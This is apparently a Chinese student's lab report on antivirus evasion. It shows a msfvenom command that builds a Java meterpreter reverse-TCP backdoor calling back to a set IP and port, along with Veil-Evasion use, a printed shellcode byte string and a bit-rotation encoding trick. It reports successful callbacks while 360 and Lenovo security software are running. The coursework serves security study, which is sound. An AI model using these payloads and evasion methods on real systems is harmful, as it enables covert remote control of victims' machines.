• 20155234 Exp3 免杀原理与实践


    使用msf编码器生成jar包

    使用指令:msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.157.141 lport=5234 x> 5234_backjar.jar

    上传扫描的结果:

    结果还行

    使用veil-evasion生成反弹链接的可执行文件:

    下载安装好veil之后,进入veil生成

    回连成功:

    扫描结果:

    利用shellcode编程等免杀工具或技巧

    生成Shellcode:
    x7fx6bx1x83x83x83xe3xax66xb2x43xe7x8xd3xb3x8xd1x8fx8xd1x97x8xf1xabx8cx34xc9xa5xb2x7cx2fxbfxe2xffx81xafxa3x42x4cx8ex82x44x61x71xd1xd4x8xd1x93x8xc9xbfx8xcfx92xfbx60xcbx82x52xd2x8xdaxa3x82x50x8xcax9bx60xb9xcax8xb7x8x82x55xb2x7cx2fx42x4cx8ex82x44xbbx63xf6x75x80xfex7bxb8xfexa7xf6x67xdbx8xdbxa7x82x50xe5x8x8fxc8x8xdbx9fx82x50x8x87x8x82x53xaxc7xa7xa7xd8xd8xe2xdaxd9xd2x7cx63xdcxdcxd9x8x91x68xexdexebxb0xb1x83x83xebxf4xf0xb1xdcxd7xebxcfxf4xa5x84xax6bx7cx53x3bx13x82x83x83xaax47xd7xd3xebxaax3xe8x83x7cx56xe9x89xebx43x2bx1exexebx81x83x82x38xax65xd3xd3xd3xd3xc3xd3xc3xd3xebx69x8cx5cx63x7cx56x14xe9x93xd5xd4xebx1ax26xf7xe2x7cx56x6x43xf7x89x7cxcdx8bxf6x6fx6bxe4x83x83x83xe9x83xe9x87xd5xd4xebx81x5ax4bxdcx7cx56x0x7bx83xfdxb5x8xb5xe9xc3xebx83x93x83x83xd5xe9x83xebxdbx27xd0x66x7cx56x10xd0xe9x83xd5xd0xd4xebx81x5ax4bxdcx7cx56x0x7bx83xfexabxdbxebx83xc3x83x83xe9x83xd3xebx88xacx8cxb3x7cx56xd4xebxf6xedxcexe2x7cx56xddxddx7cx8fxa7x8cx6xf3x7cx7cx7cx6ax18x7cx7cx7cx82x40xaax45xf6x42x40x38x73x36x21xd5xe9x83xd0x7cx56
    运行回连成功:

    组合应用各种技术实现恶意代码免杀

    读取每个Shellcode字节,并循环向左移位3位,重新输出整个code,在嵌入的代码里加上循环向右移位3位 扫描结果:

    而后执行回连成功:

    使用联想电脑管家查杀:

    用另一电脑实测,在杀软开启的情况下,可运行并回连成功

    使用的是360安全卫士:

    回连成功:

    杀软是如何检测出恶意代码的?

    观察行为特征

    免杀是做什么?

    掩盖行为特征从而避免被查杀

    免杀的基本方法有哪些?

    改变自身特征码

    实践总结与体会

    生成shellcode后我们常用的杀毒软件就检测不出来了,所以以后还是要小心,不能完全信任杀毒软件

    离实战还缺些什么技术或步骤?

    远程将后门传给目标机,然后让其自己运行。

  • 相关阅读:
    在下拉框中选择数据
    代码添加批处理类
    重置用户状态(初始化用户)
    当前窗口控制(显示、隐藏、破坏)
    窗体分隔符实现
    使用USB移动硬盘 遭遇 "Windows无法为Volume加载安装程序。请于硬件供应商联系,寻求协助" 错误,“灰鸽子”后遗症的处理
    使用IDL创建TypeLib(.tlb)文件
    ngrep使用方法
    常用的正则表达式
    治疗鼻炎的药
  • 原文地址:https://www.cnblogs.com/zxm20/p/8783493.html
Copyright © 2020-2023  润新知